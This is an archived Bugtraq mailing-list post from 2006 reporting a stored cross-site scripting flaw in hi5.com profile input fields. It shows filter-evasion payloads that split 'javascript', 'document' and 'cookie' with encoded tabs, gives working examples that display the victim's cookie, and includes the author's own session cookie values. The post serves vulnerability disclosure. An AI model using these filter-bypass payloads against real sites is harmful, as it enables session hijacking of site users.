hi5.com - XSS with cookie disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: hi5.com - XSS with cookie disclosure
From: luny@xxxxxxxxxxxxxxx
Date: 13 Jun 2006 08:20:29 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

hi5.com

Homepage:
http://www.hi5.com

Affected files:

Input boxes of editing your profile.

XSS Vuln with cookie disclosure:

It seems hi5.com allows alot of html tags to be used on thier site but they 
will filter out words like javascript, applet, and iframe tags (which is to be 
expected). Heres a link to the page that lists allthe tags they will and won't 
allow:

http://hi5.com/friend/account/html_tips.html

How do we get around this? Well, to get around the javascript filtering we use 
An embedded encoded tab to break up the javascript word. Below are a few 
examples of it. For PoC try putting this in your profile. (I used the Hometown 
box, all should work tho) :

<IMG SRC="jav&#x09;ascript:alert('XSS');">

or

<DIV STYLE="background-image: url(jav&#x09;ascript:al&#x09;ert('XSS'))">

Why do we have to use an embedded encoded tab in the word "alert" in a div tag 
and not a img tag? I have no idea! 

Screenshots:
http://www.youfucktard.com/xsp/hi52.jpg
http://www.youfucktard.com/xsp/hi53.jpg

WHERES THE COOKIE?!?!

Now lets change that so we can show our cookie data. Since they don't seem to 
allow thewords document and cookie, 

lets use the same method above to break it up. Try putting:

Popup alert:
<IMG SRC="jav&#x09;ascript:alert(docu&#x09;ment.coo&#x09;kie);">

Write on screen:
<IMG SRC="jav&#x09;ascript:docu&#x09;ment.write(docu&#x09;ment.cookie);">

Our Cookie:
hi5banner_traffic_US; hi5medium_traffic_US; hi5sky_traffic_US; hi5uniqueAd2=1; 
hi5adcomRect; hi5adcomSky; 
hi5inpath=-1;hi5sp=homepage;hi5loggedIn=true;adHistoryLdr=4:1150268890485:4:1150268897936:1:1150269052890:1:1150269092966:8:1150269130139:9:1150269256989:9:1150269310562:10:1150269315812:11:1150269416327:11:1150269438591:12:1150269446349:13:1150269502289:13:1150269518708:14:1150269567146:15:1150269654968;
 sc=Fics:0:Ficb:0:Ficl:0; JSESSIONID=a229uu7JgBN7; 
K-JSESSIONID0x9882f778=6821EBA8AA2FB03B1F4D6B04A2799FED;adHistoryRct=1001:1150268898713:1001:1150269130834:1004:1150269316178:1004:1150269447018:1002:1150269519194:1002:1150269669974:1008:1150269721357:1007:1150269799646:1007:1150269971317:1010:1150270159468:1011:1150270778028:1011:1150270823873:1012:1150270950243;adHistorySky=2004:1150269046423:2004:1150269086714:2001:1150269250710:2001:1150269303450:2008:1150269409727:2007:1150269432295:2007:1150269495667:2020:1150269560927:2002:1150269648476:2002:1150269691452:2012:115
 
0269709420:2011:1150269751737:2011:1150269785251:2014:1150270053753:2015:1150270141733



Screenshots:
http://www.youfucktard.com/xsp/hi54.jpg
http://www.youfucktard.com/xsp/hi55.jpg

Prev by Date: Re: SSL VPNs and security
Next by Date: Re: GamePlay.co.uk XSS
Previous by thread: Apnaspace.com - XSS with cookie disclosure
Next by thread: ISO.org - XSS vulnerability
Index(es):
- Date
- Thread